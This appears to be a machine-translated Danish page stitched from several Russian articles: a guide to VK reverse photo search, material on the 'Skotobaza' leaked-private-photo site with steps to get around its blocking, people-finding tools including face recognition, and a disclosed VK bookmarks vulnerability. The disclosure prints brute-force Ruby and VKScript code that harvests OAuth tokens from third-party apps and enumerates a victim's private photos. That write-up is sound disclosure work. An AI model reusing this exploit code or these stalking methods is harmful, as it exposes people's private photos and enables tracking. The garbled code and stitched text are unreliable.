• hjem
  •  > 
  • Spil
  •  > 
  • VKontakte privat fototjeneste. Arbejder med adresselinjen

VKontakte privat fototjeneste. Arbejder med adresselinjen

I dag vil vi fortælle jer, kære læsere, om en ekstremt usædvanlig funktion, der er til stede i VK - at søge efter lignende billeder, når du kan finde brugere, der har det samme billede uploadet til deres profil.

Hvorfor er det nødvendigt, spørger du? Der er to hovedårsager.

  • Først. Ved hjælp af søgning identiske billeder du kan altid finde (eller ikke finde) den person, der bruger dine billeder. Med andre ord vil du være i stand til at opdage dine egne kloner.
  • Den anden grund. Lad os sige, at du skal finde en person, men du har kun hans billede. Med dens hjælp kan du bruge billedsøgningen på VK, og muligvis vil du finde den person, du leder efter.

Det er værd at bemærke, at der er mange fotosøgetjenester, for eksempel har Google det, men i I dette tilfælde Søgningen udføres ikke på tværs af hele internettet, men kun på VKontakte.

Søger en bruger efter billede

Lad os begynde at søge. Lad os sige, at vi skal finde kloner eller brugere, der har uploadet et bestemt billede.

Det første skridt er at åbne det billede, vi leder efter. Hvis det ikke er uploadet til dit fotoalbum, skal du downloade det.

Åbn et billede, for eksempel:

Lad os se på adresse bar browser. Du bør se en adresse som denne: https://vk.com/photo**********_384*****. Under stjernerne Foto******** din gemmer sig, og tallene 384****** , som er efter understregning, dette er fotonummeret. Kopier denne adresse, men uden https://vk.com/, det vil sige, at du skal lykkes billede**********_384*****.

Luk fanen eller lad den være åben og åbn en ny, gå til VK-siden og vælg sektionen "Mine nyheder" i menuen. Du vil se et nyhedsfeed:

Hvis der er et "Fotos"-element ved siden af ​​"Feed"-underafsnittet, skal du springe dette trin over. Hvis varen mangler, skal du klikke på krydset og tilføje "Fotos"-elementet.

Klik på punktet "Fotos". Søgelinjen "Søg efter billeder" vises.

Vi skriver et ord på en linje kopi: og tilføj et link til billedet, som vi kopierede tidligere, det vil sige, du skulle få noget som dette: copy:photo**********_384*****. Bemærk venligst, at stjernerne kun er et eksempel, under dem er id'et og serienummer billeder! For eksempel, hvis vi tager et specifikt fotografi af Pavel Durov for at søge, så skal vi i linjen skrive f.eks. copy:photo1_327778612, hvor foto1 er bruger-id'et (Durova i dette tilfælde), og 327778612 er fotoets serienummer. Tryk derefter på Enter-tasten.

I vores tilfælde var vi i stand til at opdage 7 identiske fotografier.

Hvis du klikker på hver af dem, kan du se, hvilken bruger eller offentlighed billedet blev uploadet til. Sandsynligvis udføres søgningen kun på de billeder, der er i det offentlige domæne. Vi kunne ikke finde nogen billeder, der var blokeret fra visning.

De, der først stødte på "Skotobaza", vil blive ubehageligt overrasket eller endda forarget - dette er det frastødende navn, der er givet til webstedet, der gemmer millioner af private billeder af VKontakte-brugere. Hvad denne ressource gemmer i sig selv, og om det er muligt at få adgang til sin base - yderligere.

Hvad er "Skotobaza"

"Skotobaza"-ressourcen, som har samlet omkring 107 millioner inkriminerende billeder af brugere på sine servere, er langt fra innovativ. Selv for 15 år siden begyndte LiveJournal at udgive "for sjov" helt ærligt mislykkede billeder, som er lagt op af brugere. "Skotobaza" blev guidet (ja, netop i datid - i dag kan webstedet ikke findes i en søgemaskine, da det er lukket af Rospotrebnadzor) om indholdet af det sociale netværk "Vkontakte".

Det skal bemærkes med det samme: Hvis du har lagt et billede op i et album med en lås "Kun synlig for mig", kan et sådant billede ikke vises i "Dyredepotet". Men hvis du sendte et billede til din samtalepartner, lukket samfund, i et fotoalbum, kun synligt for venner eller en begrænset gruppe mennesker, så er det muligt, at det allerede var i domænet af denne tvivlsomme ressource.

Mange, efter at have lært, hvad "Skotobaza" er, tyede til denne ressource for at finde ud af noget personligt om deres venner, fjender, dårlige ønsker og for at tjekke deres soulmate. Siden må siges, at dygtigt profiterede på skødesløse brugere, der sendte for mange private billeder hvem har ikke brug for det, og hvor det ikke har brug for det. For en bestikkelse på 490 rubler kunne du ikke kun permanent fjerne dine billeder fra Animal Farm-arkiverne, men også få en form for garanti for, at du ikke længere ville blive vist på denne ressource.

"Skotobaza": analoger

Som allerede nævnt blev siden lukket af indlysende årsager. "Skotobaza" forsøgte at komme sig ved at flytte til andre domæner, men forgæves - adgangen til dem blev også blokeret. Ressourcen har heller ikke et "spejl".

Til en vis grad var analogen til webstedet en lignende ressource "Burn", men den er heller ikke længere operationel. Samme skæbne overgik det mindre eksemplar af Poiskvk. Selvfølgelig, hvis du "surfer" i Odnoklassniki, Vkontakte, Instagram, Facebook, kan du finde lukkede grupper og fællesskaber, hvor brugere poster personlige og mislykkede billeder af deres tilfældige samtalepartnere og bekendte (de samme én gang populære grupper"Høns" og "Haner" i hver by).

Naturligvis vil en ressource af dyregårdens skala ikke dukke op med det samme - det vil tage meget tid, i det mindste at samle et sådant arkiv.

Omgå "Skotobaza"-blokeringen

Efter at adgangen til ressourcen blev blokeret, dukkede mange lifehacks som "Skotobaza" op på netværket: omgå blokeringen." Det menes, at det er muligt at se fotodatabasen ved at skjule din IP-adresse, det vil sige placeringen af ​​dig selv og din gadget, da Rospotrebnadzor kun er autoriseret til at blokere adgang for russere. Dette kan gøres på to enkle måder:

  1. Gennem Opera-browseren, versioner, der ikke er ældre end september 2016. Denne udvikling er god, fordi den har en indbygget VPN - privat virtuelt netværk, som giver dig mulighed for ikke at reklamere for handlingerne fra pc-ejeren, der forsøger at komme til Livestock Depot-webstedet. Bypasset udføres således: gå til “Indstillinger” (dette kan gøres ved at trykke på “CTRL+F12” knapperne), find “Sikkerhed” og i den “VPN” sektionen. Aktiver tilstanden og prøv at søge efter den skandaløse ressource.
  2. Gennem anonymiseringssider. Klik om nødvendigt på "Skjul mig" og indtast: skotobaza.org. Ressourcen skal omdirigere dig til adressen. Der er en ulempe, og det er følgende: det er ikke så nemt at finde på internettet gratis anonymizer for at komme ind i arkivet på "Skotobaza"-webstedet.

At omgå blokeringen på denne måde kan hurtigt gøres ved hjælp af disse operationer.

Sådan bruger du "Skotobaza"

Efter at have lært om "Skotobaza", vil mange gerne tjekke, om de selv eller deres slægtninge og venner har optrådt på denne ressource. Dette er meget nemt at gøre: skriv i vinduet på hjemmeside det nødvendige VKontakte-bruger-id. Hvis han er til stede i denne tvivlsomme database, vil systemet omdirigere dig til hans fotoarkiv.

Hvis du tror på nogle brugeres ord, blev det i 2017 umuligt at gå til "Skotobaza", da dens skabere slettede ressourcen, som tilsyneladende ikke længere giver dem samme overskud.

Hvordan kan du ellers finde en brugers billede?

Efter at have fundet ud af, hvad en "Skotobaza" er, vil du sandsynligvis bruge mindre tvivlsomme tjenester til at finde en person og hans billede:

  1. Yandex.People-system: Indtast dit for- og efternavn i søgemaskinen.
  2. Service Find ansigt: personer søges efter foto - systemet genkender ansigtet på billedet og tilbyder profiler lignende mennesker V i sociale netværk.
  3. Søg efter billede i Google (klik Højreklik musen på billedet - "Søg billede i Google"): systemet vil søge lignende billede ikke kun på sociale netværk, men overalt på internettet. Hvis billedet ikke er online, skal du trække dets ikon ind i browservinduet og begynde at søge.
  4. På samme måde kan du bruge Yandex's "Søg efter billede": klik på kameraikonet ved siden af ​​hovedlinjen.
  5. Intellektuel "Nigma.Ru", ved hjælp af resultaterne fra både Google og Yandex.

Hvad er "Skotobaza" i en nøddeskal - en skandaløs ressource, der har akkumuleret stor samling private billeder af VK-brugere. Hvis du vil finde en person eller et billede på internettet, er det meget mere tilrådeligt at bruge autoriserede søgemaskiner til at gøre dette.

Ikke helt online juridiske tjenester. For eksempel Skotobaza. Dette er et websted, der gemmer personlige billeder af VKontakte-brugere. Og også dem, der nogensinde er blevet postet og efterfølgende slettet. Du kan også finde skjulte eller slettede venner. Siden er blokeret af Roskomnadzor, men blokeringen kan omgås. På tidspunktet for blokeringen havde robotterne samlet mere end 106 millioner billeder.
Personligt lykkedes det mig at finde mine billeder lagt på VK tilbage i 2009 og slettet for længe siden.

Hvad er Skotobaza?

Traditionen med at lække billeder på RuNet går tilbage til Freaksskolen i begyndelsen af ​​2000'erne. School of Freaks er et LiveJournal-fællesskab, hvor brugere af sociale medier poster dårlige billeder til grin. Skotobaza plejede at have noget lignende, men i 2014 lancerede Skotobaza som en tjeneste til lagring af private billeder af VKontakte-brugere. Faktisk er de ikke helt private – hvis der er en lås på billedet, så ender det ikke i nogen Animal Farm. Det er bare, at mange mennesker poster personlige billeder for en begrænset kreds af mennesker: for eksempel i albummet i et lukket fitnessfællesskab. Eller i det fri. Og derfra vandrer fotografierne til kvægdepotet.

Hvad kan du finde i det?

Først og fremmest billeder, der ikke er lagt ud på VKontakte-brugeren Åben adgang, men ikke desto mindre blev de på en eller anden måde afsløret et eller andet sted: i samfundet, blandt venner og lignende albums. Generelt vil du kunne se mere, end du burde. Selvom ikke alle brugere er i kvægdepotet, og ikke alle de nyeste dræn hældes der. Som jeg allerede sagde, fandt jeg mine billeder der fra 2008, men seneste billeder det er usandsynligt, at du finder brugere, blot fordi tjenesten er inde i øjeblikket Jeg holdt op med at samle billeder.

Er det muligt at slette et billede fra Dyregården?

Der plejede at være en tjeneste betalt fjernelse fotografier. For 490 rubler kunne du købe freden på din VK-profil. Fotos blev slettet og aldrig tilføjet igen. Nu er der ingen sådan service, det er bare, at selve webstedet er blokeret af Roskomnadzor. Men det betyder ikke, at du ikke kan gå til den uden om blokeringen og se, hvad der er der.

Er der nogen analoger til Skotobaza?

Du skal forstå, at foto- og videoindhold fylder meget, og sådanne sider kan ikke oprettes i et snuptag. Desuden er de blokeret alligevel. The Animal Farm havde en analog, spalili.org, men den virker ikke længere. Det vil sige, at der slet ikke er nogen - der er ikke engang en blokering, der kunne omgås.

Dyregården har heller ikke et spejl. Kvægdepotet forsøgte flere gange at flytte til forskellige domæner, men de er stadig dækket.

Du kan omgå blokeringen af ​​Animal Farm-webstedet. Til dette er nøjagtig de samme metoder egnede som til at omgå blokeringen af ​​Rutreker-webstedet - begge disse websteder er blokeret af Roskomnadzor, og det er nok at logge ind anonymt. For at gøre dette kan du installere en udvidelse i din browser; dette er beskrevet detaljeret i min . Der er mulige udvidelser til hver browser, og hvor man kan få dem.

Og den udkom for nylig en ny version Opera med indbygget VPN, der er en anden måde at omgå blokeringen på. For at gøre dette skal du bare aktivere VPN-tilstand i Opera-indstillingerne og derefter roligt gå til kvægstationen. Jeg vil forklare, for en sikkerheds skyld, hvordan du aktiverer VPN i den nye Opera.

Sådan aktiverer du VPN i Opera

Først skal du have en ny Opera (ikke ældre end september 2016) - download hvis ikke.

Du kan gå til Skotobaza.org.

Hurtig engangsmetode

Hvis du er virkelig doven, så kan du omgå blokeringen af ​​Stockyard på denne måde:


Eksempel på brug af Stockyard

Indtast bruger-id'et i kontakten, for eksempel id123456, i feltet, og du vil modtage hans billeder og en liste over venner.


Søg på husdyrdepot

Hvor ellers kan du søge efter personer og billeder?

Hvis du ikke kunne komme ind i webstedets database eller ikke kunne finde noget i den, kan du prøve lykken på andre websteder. Det sker, at oplysninger, der er lukket i VK, er åbne på Odnoklassniki, Facebook, Twitter og andre netværk eller udgivet på uventede websteder. Så her er måderne at komme igennem informationen på.

Søg efter personer på sociale netværk fra Yandex

Lad os sige, at der er et for- og efternavn på en person, du er interesseret i. Ved at bruge dem kan du søge efter en persons profiler på andre sociale netværk. For at gøre dette skal du prøve at indtaste dit for- og efternavn i tjenesten (people.yandex.ru). Der kan du angive andre parametre, der tydeliggør din identitet.

FindFace service

Hvis du har et billede af en person, kan du bruge den velkendte tjeneste (https://findface.ru), som nu også søger efter profiler på Twitter. Denne tjeneste er designet til ansigtsgenkendelse: I den kan du for eksempel finde en person baseret på et billede, du har taget på gaden.

Det betyder, at hvis to VK- og Twitter-profiler har den samme person (selvom billederne er forskellige), så kan du ved hjælp af billedet fra den ene profil finde den anden profil.

Google Billedsøgning

Du kan søge efter billede: hvis der er et billede, som du tror kunne tjene som en avatar for denne person et andet sted, så kan du søge efter billede: du vil finde denne person på et andet websted. Måske kommer der flere på en anden side åben information om brugeren.

Forskellen med er, hvad FindFace leder efter lignende billeder, men kun på VK og Twitter. Og en søgning på Google udføres overalt på internettet, men kun identiske billeder findes (præcis), her er ingen smart ansigtsgenkendelse. Lignende billeder Google dukker også op, men lighed bestemmes af farve, form osv. og ikke af ansigt. På Google kan du kun håbe på at finde en identisk avatar på et andet websted.

Så for en Google-billedsøgning:



Søg efter billede Yandex

På samme måde kan du søge efter billede i Yandex.


Facebook-personsøgningstjeneste

Der er også interessant søgning og spore folk på Facebook. Denne tjeneste søger i alle kommentarer specifik bruger, fotografier, hvor han er tagget og meget mere. Indbygget Facebook-søgning meget begrænset, men tjenesten hjælper med at omgå restriktionerne.

Søgemaskine Nigma

Sommetider søgesystem(nigma.ru) viser profiler, der ikke findes i Yandex. Selvom det ser ud til at være et sekundært system, der ikke bruger sine egne algoritmer. Jeg fandt dog på den første side noget, som Yandex ikke leverede. Prøv det, måske støder du på noget interessant. Bare gå ind søgelinjen for-og efternavn. Du kan prøve at indtaste personens kaldenavn, hvis du har et.

Situationen i 2017

Desværre virker løsningerne ikke længere i 2017. Jeg tjekkede flere gange. På dette øjeblik Siden er ikke kun blokeret af Roskomnadzor, men den understøttes ikke længere - den eksisterer ikke selv uden om blokeringen. Tilsyneladende besluttede skaberne, at det var dyrt og meningsløst at holde denne side flydende, hvis kun et par mennesker alligevel besøger den, uden at blokeringen. Der kom flere dusin mennesker hver dag, tror jeg. Og det er for lidt.

tl;dr

Der blev opdaget en sårbarhed i VK-bogmærker, som gjorde det muligt at modtage direkte links til private billeder fra personlige beskeder og album fra enhver bruger/gruppe. Der blev skrevet et script, der sorterede i brugerens billeder til bestemt periode og derefter, gennem denne sårbarhed, modtaget direkte links til billeder. Kort sagt kunne du få alle dine billeder fra i går på 1 minut, alle billeder uploadet i sidste uge på 7 minutter, sidste måned på 20 minutter, sidste år på 2 timer. Sårbarheden er nu rettet. VKontakte-administrationen udbetalte en belønning på 10.000 stemmer.


Historien begyndte, da et billede blev sendt til mig i en personlig besked på VKontakte. Normalt, hvis noget er vigtigt, uploader jeg det til skyen, men i mit tilfælde var dette ikke nødvendigt, og jeg besluttede at bruge VKontakte-bogmærkefunktionen.

Kort om denne funktionalitet: alle ting, som brugeren har kunnet lide, føjes til bogmærker; der er også en funktion til manuelt at tilføje et link til en bruger og internt link"I kontakt med". Det sidste punkt virkede meget interessant for mig, for efter at have tilføjet et link til billedet, så jeg dets forhåndsvisning og tekst med typen af ​​tilføjet enhed:

Når et link tilføjes, analyserer serveren det, forsøger at finde ud af, hvilken entitet det refererer til og henter information om dette objekt fra databasen. Typisk, når man skriver denne form for funktion med mange betingelser, er sandsynligheden for, at udvikleren glemmer noget, meget høj. Så jeg havde ikke råd til at lade være og besluttede at tage et par minutter til at eksperimentere lidt.

Som et resultat lykkedes det mig at finde noget. Ved at tilføje et link til et foto, en note eller en video, der ikke er tilgængelig, kan du få lidt privat information om objektet. I tilfælde af fotos og videoer er dette en lille (150x150) forhåndsvisning, hvor det er ret svært at se noget; titlen blev vist for private noter. Via API metode fave.getLinks det var muligt at få links til billedet, men igen for meget lille størrelse(75px og 130px). Så i bund og grund ikke noget alvorligt.

Jeg besluttede at gå til mobil version websted for at kontrollere, om alt vises der på samme måde som i almindelig version. Da jeg så på sidekoden, så jeg dette:

Ja! I attributværdien data-src_big der var et direkte link til det originale billede!

Således var det muligt at få et direkte link til ethvert billede på VKontakte, uanset hvor det blev uploadet og hvilke privatlivsindstillinger det havde. Dette kan være et billede fra personlige beskeder eller et foto fra de private albums for enhver bruger/gruppe.

Det ser ud til, at jeg kunne stoppe der og skrive til udviklerne, men jeg spekulerede på, om det var muligt, ved at udnytte denne sårbarhed, at få adgang til alle (eller downloadet i en vis periode) billeder af brugeren. Hovedproblemet her var, som du forstår, at linket til et privat billede af formularen ikke altid er kendt fotoXXXXXX_XXXXXXXXX for at tilføje til dine bogmærker. Tanken om at søge gennem billedets id kom til at tænke på, men af ​​en eller anden grund afviste jeg det straks som skørt. Jeg tjekkede de foto-relaterede metoder i API'et, så på, hvordan applikationen fungerer med album, men jeg kunne ikke finde nogen lækager, der kunne hjælpe mig med at få en liste med id'erne for alle brugerens private billeder. Jeg var ved at opgive denne idé, men ved igen at kigge på linket med billedet, indså jeg pludselig, at det var en god idé at gå overbord.

Sådan fungerer billeder i VK

Hvordan kunne du erstatte, link til billede foto52708106_359542386 består af to dele: (bruger-id)_(noget mærkeligt nummer). Hvordan er anden del dannet?

Ak, efter at have brugt to timer på at eksperimentere, forstod jeg stadig ikke dette. I 2012, på HighLoad++, sagde Oleg Illarionov et par ord om, hvordan de gemmer billeder, om vandret sønderdeling og tilfældigt udvalg server til download, men denne information gav mig ikke noget, da der ikke er nogen synlig forbindelse mellem server-id og foto-id. Det er klart, at der er en slags global tæller, men der er en anden logik der... For hvis det andet tal blev dannet ved hjælp af almindelig auto-increment, ville værdierne af foto-id'er for længe siden have nået enorme værdier ​​(for Facebook, for eksempel, er det i øjeblikket ~ 700 billioner), men for Vkontakte er denne værdi kun ~ 400 millioner (selvom, at dømme efter statistikken, daglige brugere uploader mere end 30 millioner billeder). De der. Det er tydeligt, at dette tal ikke er unikt, men det er samtidig ikke tilfældigt. Jeg skrev et script, der gik gennem fotografierne af "gamle" brugere, og ved hjælp af de modtagne data lavede jeg en graf over, hvor meget dette tal ændrede sig for hver år:

Det kan ses, at værdierne svinger afhængigt af nogle faktorer (antal servere eller ny logik?). Men pointen er, at de er små nok (især i de sidste 2-3 år), og det er meget nemt at beregne id-intervallet for den ønskede tidsperiode. Det vil sige, for at finde ud af direkte links til en brugers billeder, f.eks. fra sidste år, skal du prøve at bogmærke kun 30 millioner (fra _320000000 til _350000000) forskellige varianter af links! Nedenfor har jeg beskrevet en brute force-teknik, der tillod mig at gøre dette på få minutter.

Går billeder igennem

Du kan tilføje alt dette manuelt gennem grænsefladen eller skrive et script, der tilføjer ét link til bogmærker, men det ville være kedeligt og tidskrævende. Søgehastigheden i dette tilfælde ville være 3 bogmærker i sekundet, pga sende mere end tre anmodninger i sekundet til Vkontakte-serveren det er forbudt.

Fremskynd søgningen x25

For at omgå grænsen på 3 anmodninger i det mindste en smule, besluttede jeg at bruge metoden udføre. I et kald til denne metode er 25 kald til API-metoder mulige.

Var start = parseInt(Args.start); var end = parseInt(Args.end); var victimId = Args.id; var link = "http://vk.com/photo" + victimId + "_"; while(start != slut) ( API.fave.addLink(( "link": link + start )); start = start + 1; );
Således lykkedes det at øge brute force-hastigheden til 3*25 bogmærker/sek. I løbet af det seneste år ville det have taget lang tid at sortere i fotografier, men i korte perioder var denne sorteringsmetode allerede ret god.

Vi fremskynder søgningen x25 * antal parallelle anmodninger pr. sekund

Grænsen på antallet af anmodninger/sek. gælder for hver applikation separat, og ikke for hele brugeren. Så intet forhindrer dig i at sende mange anmodninger parallelt, men samtidig bruge tokens fra forskellige applikationer.

Først skulle vi finde (eller oprette) det nødvendige antal applikationer. Der blev skrevet et script, der søger efter selvstændige applikationer i en given række applikations-id'er:

Klasse StandaloneAppsFinder attr_reader:app_ids def initialize(params) @range = params[:in_range] @app_ids = end def search (@range).each do |app_id| respons = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
Det var også muligt at vælge applikationer efter antal brugere for yderligere at fremskynde søgningen:

Men jeg besluttede ikke at bøvle med det.

Ok, applikationerne er fundet, nu skal de give tilladelse til vores brugers data og modtage tokens. Til autorisation var vi nødt til at bruge Implicit Flow-mekanismen. Jeg var nødt til at parse autorisations-URL'en fra OAuth-dialogen og trække tokenet ud efter omdirigeringen. Denne klasse kræver cookies for at fungere. p,l(login.vk.com) og remixsid(vk.com):

Class Authenticator attr_reader:access_tokens def initialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def authorize_apps(apps) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
Antallet af fundne ansøgninger svarer til antallet af parallelle anmodninger. For at parallelisere det hele, blev det besluttet at bruge Typhoeus-perlen, som har bevist sig i andre opgaver. Resultatet er en lille brute forcer som denne:

Class PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ( "i dag" => 366300000..366500000, "yesterday" => 366050000..366300000, "current_month" => 360.00005th => 3650.0605th 000 000..365000000, "current_year" = > 350000000..366500000, "last_year" => 320000000..350000000 ) def initialize(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD] ende:hydraulent. 0 (@period).trin(25) til |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? end hydra.run medmindre hydra.queued_requests.count.zero? end private def vkscript(photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
For at fremskynde den brute force endnu mere, var der et forsøg på at slippe af med den unødvendige krop i reaktionen, men HOVED VKontakte-serveranmodning returnerer en fejl 501 Ikke implementeret.

Den endelige version af scriptet ser sådan ud:

Kræv "nokogiri" kræver "open-uri" kræver "tyfus" kræver "json" kræver "./standalone_apps_finder" kræver "./photos_bruteforcer" kræver "./authenticator" bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, periode: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookies fra login.vk.com # remixsid - cookie fra vk.com authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
Efter at have kørt programmet, indeholdt bogmærkerne alle brugerens billeder i en given periode. Det eneste, der var tilbage, var at gå til mobilversionen af ​​VKontakte, åbne browserkonsollen, trække direkte links ud og nyde billederne i deres originale størrelse.

Resultater

Generelt afhænger det hele af din internetforbindelse og hastigheden på proxy-servere, ventetid på Vkontakte-servere, processorkraft og mange andre faktorer. Efter at have prøvet scriptet ovenfor på min konto, fik jeg følgende tal (uden at tage hensyn til den tid, der blev brugt på at modtage tokens):

Tabellen viser den gennemsnitlige tid, der kræves for at prøve billed-id'er over en bestemt periode. Jeg er sikker på, at alt dette kunne have været fremskyndet 10-20 gange. For eksempel, i et brute force script, lav én stor kø af alle anmodninger og normal synkronisering mellem dem, fordi i min implementering vil en anmodning med timeout sinke hele processen. Og generelt kan du bare købe et par forekomster på EC2 og få alle billederne af enhver bruger på en time. Men jeg ville allerede sove.

Og generelt er det lige meget, hvor meget tid angriberen bruger på dette, 5 timer eller hele dagen, for på en eller anden måde vil han få links til private billeder. Evnen til sikker adgang til private oplysninger på en begrænset tid er den største trussel, som denne sårbarhed udgør.

Rapportering af en sårbarhed

Først blev rapporten sendt til supporttjenesten, men efter et svar som "tak, vi skal nok ordne det på en eller anden måde..." og en uges venten, følte jeg mig lidt trist. Mange tak til Bo0oM, som hjalp med at kontakte udviklerne direkte. Derefter blev fejlene lukket inden for et par timer, og et par dage senere overførte administrationen en belønning på 10k til min konto

En kæmpe samling af private fotografier på VK (ca. 100 mio.). Tjenesten indsamler billeder af alle brugere af sociale medier. netværk i en enkelt mappe.

Det er nemt at finde billeder af en bestemt bruger - bare indtast det. Men det er svært at fjerne, hvis du skriver til skaberne via e-mail, så er chancen lav, men hvis du giver donationer, øges chancen.

Hvordan samler kvægdepotet billeder på VK? Det er meget enkelt: Tjenesten uploader automatisk billeder af alle brugere online til samlingen. Det er lige meget, hvor du poster dit billede, i et fællesskab eller en profil. Selvom billedet slettes efter et par minutter, vil det allerede være på kvægstationen.

Derfor henvendte mange utilfredse brugere sig til Roskomnadzor, hvilket bidrog til kvægstationen var spærret på Den Russiske Føderations område. Det er ikke muligt at omgå blokeringen.

Indsamling og opbevaring af brugeres personlige data er forbudt. Selvom brugerne selv poster billeder offentligt.

For nu siden virker ikke selv med proxy-servere. Ejerne forlod virksomheden umiddelbart efter spærringen. Så du kan sove roligt og ikke være bange for, at nogen vil se på dine personlige billeder.

Analoger af Skotobaza

I 2018 Der var forskellige analoger, såsom "Brænd", men de virker ikke alle, da VKontakte-udviklere tilpassede scripts, der forbyder bots at stjæle private billeder.

Opmærksomhed: Internettet er fyldt med "analoger" af en kvægfarm, men ikke kun virker de ikke, men de forårsager også konto hacking! Hvis du støder på sådanne websteder, under ingen omstændigheder Indtast ikke data fra VKontakte. Angribere vil få adgang til kontoen og være i stand til det.

Æraen med husdyrbrug og lignende tjenester er forbi. Nu er opbevaring og distribution af intime, private fotografier forbudt. Hvis du ikke følger loven, følger straf.